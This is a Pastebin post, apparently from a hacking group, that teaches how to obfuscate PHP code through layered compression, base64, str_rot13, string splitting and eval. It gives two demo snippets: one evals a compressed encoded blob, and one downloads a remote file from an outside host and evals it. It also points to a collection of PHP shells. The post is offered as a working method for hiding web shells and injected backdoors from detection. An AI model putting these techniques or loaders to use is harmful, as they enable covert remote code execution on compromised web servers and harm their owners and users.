Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- lets do some phpshit shall we..
- need to automated those things, if anyone could help
- i was trying many encoding and compressing to obfuscate php lately
- the most effective technique i have found is :-
- to
- 1. escape and quote('') html & style scripts into echo'' or any, so the <?php ?> tag continues.
- 2. take some 'ultasidha' functions like > public function terimaki($aankh){};
- 3. use some layered variables( can be 'ultasidha' like > $_-bal-_cher ) in ur code
- 4. compress it to 9th level using gzcompress, gzdeflate, gzencode (i prefer deflate)
- 5. use layered base_64 encode and/or string rotate, regular expression replace, byterun...
- 6. split and concat your chunks(encoded) as many as possible (use strpos for manual input)--- Demo code 1
- 7. Go to 4 if you like to play and the processes continues
- 8. host your code to your personal server and use file_get_content--- Demo code 2
- try decoding v3.3 for best practice > https://code.google.com/p/shells/
- Demo code 1 (no garbage):-
- <?php
- function india($yamraaj){eval("\$ihos=gz" . "inf" . "la" . "te(b" . "as" . "e6" . "4_d" . "ec" . "ode(\$yamraaj));eval(\$ihos);");}
- india("
- 'JZvHbsRIlkX39SNd"."BS5okwbd0wV6n3RJ"."qCwrChAlmv//RzcQ"."PMn/+ddff/317z/+'
- .'/u9//v4/'
- ");
- Demo code 2 :-
- <?
- $in73ct = "http://injects.googlecode.com/files/sssss.txt";
- $inj3ct = file_get_contents($in73ct);
- eval (gzinflate(str_rot13(base64_decode(str_rot13(gzinflate(base64_decode($inj3ct)))))));
- ?>
- files :-
- http://scci.com.pk/obf.php (translated version)
- http://www.4shared.com/zip/cAfDJsDGba
- Link :- facebook.com/indiansquad | Indian Hacker's Online Squad ( i-HOS)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement